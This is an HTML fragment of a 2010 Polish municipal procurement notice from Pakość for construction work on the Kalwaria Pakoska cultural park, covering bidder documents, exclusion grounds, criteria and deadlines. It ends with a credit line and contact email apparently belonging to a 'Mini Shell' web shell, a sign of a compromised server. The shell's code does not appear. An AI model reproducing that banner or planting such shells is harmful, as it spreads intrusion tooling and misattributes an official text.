-dla Przychodu wg średniego kursu NBP na dzień zakończenia roku obrachunkowego
-dla posiadanych środków finansowych zdolności kredytowej wg średniego kursu NBP na dzień wystawienia dokumentu.
-Opłaconą polisę na kwotę min. 1.000.000,00 PLN, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają warunek określony w ppkt. 13.
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana na podstawie złożonych dokumentów wg formuły  spełnia -niespełna</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty dodatkowe wymagane od wykonawcy
1) Proponowany przez Wykonawcę harmonogram rzeczowo - finansowy sporządzony na podstawie harmonogramu załączonego do SIWZ (harmonogram jest zgodny z zakresem ujętym w podpisanej umowie o dofinansowanie na realizację zadania pn. Utworzenie parku kulturowego Kalwaria Pakoska jako element promocji dziedzictwa Kujaw i Pałuk (stanowiący załącznik nr 9)
      Ostateczna wersja harmonogramu zostanie zaakceptowana przez Zamawiającego przed podpisaniem     
      umowy z wyłonionym w postępowaniu przetargowym wykonawcą i będzie stanowić załącznik do  
      umowy. 
2)	Oświadczenie o akceptowaniu warunków określonych w SIWZ oraz o zapoznaniu się z warunkami w terenie i nie zgłaszaniu zastrzeżeń co do przedmiotu zamówienia - wg załącznika nr 4 do SIWZ.
3) Uproszczony kosztorys ofertowy.
4)Wykaz części zamówienia, które wykonawca zamierza przeznaczyć podwykonawcom- wg  załącznika nr 6</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzenia następujących zmian w umowie:
1) Zmiana podmiotów reprezentujących wykonawcę i zamawiającego - z przyczyn obiektywnych lub  subiektywnych;
2) W przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację  przedmiotu umowy;
3) Konieczność zmiany terminu umownego i harmonogramu realizacji robót z powodu:
- konieczności wykonania dodatkowych badań, ekspertyz, analiz itp.
- z uwagi na niekorzystne warunki atmosferyczne uniemożliwiające terminową realizację
robót budowlanych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pakosc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Pakości, ul Rynek 4,88-170 Pakość.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2010 godzina 09:30, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego przy ul. Rynek 4, 88-170 Pakość, w sekretariacie (parter, pok. nr 5).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest finansowane przy udziale środków pochodzących z Europejskiego Funduszu Rozwoju Regionalnego, w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko- Pomorskiego na lata 2007 -2013 oraz ze środków własnych Gminy Pakość.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com